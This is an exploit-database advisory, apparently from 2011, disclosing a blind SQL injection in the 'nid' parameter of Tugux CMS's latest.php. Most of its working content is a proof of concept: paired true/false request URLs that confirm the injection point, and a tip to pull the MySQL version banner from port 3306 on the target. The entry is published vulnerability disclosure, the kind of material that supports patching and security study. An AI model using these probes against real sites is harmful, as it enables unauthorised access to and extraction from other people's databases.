Tugux CMS - 'nid' Blind SQL Injection

Author: eidelweiss
type: webapps
platform: php
port: 
date_added: 2011-03-18 
date_updated: 2011-03-19 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comtuguxCMS_v.1.0_final.rar

===================================================================
    Tugux CMS (nid) BLIND sql injection vulnerability
===================================================================

Software:   Tugux CMS
Vendor:     www.tugux.com
Vuln Type:  BLind SQL Injection
Download link:  http://sourceforge.net/projects/tuguxcms/files/tuguxCMS_v.1.0_final.rar/download
Author:     eidelweiss
contact:    eidelweiss[at]windowslive[dot]com
Home:       www.eidelweiss.info


References: http://eidelweiss-advisories.blogspot.com/2011/03/tugux-cms-nid-blind-sql-injection.html


===================================================================

    exploit & p0c

[!] latest.php?nid=[valid nid]

    Example p0c

[!] http://server/latest.php?nid=9    <= True
[!] http://server/latest.php?nid=-9   <= False

[+] http://server:3306    <= download the file , save and open with c++ or wordpad will show mysql version

[!] sample: http://server:3306 result : 5.0.92-community (use versi 5.0.92) :D


====================================================================

    Nothing Impossible In This World Even Nobody`s Perfect

===================================================================

==========================| -=[ E0F ]=- |==========================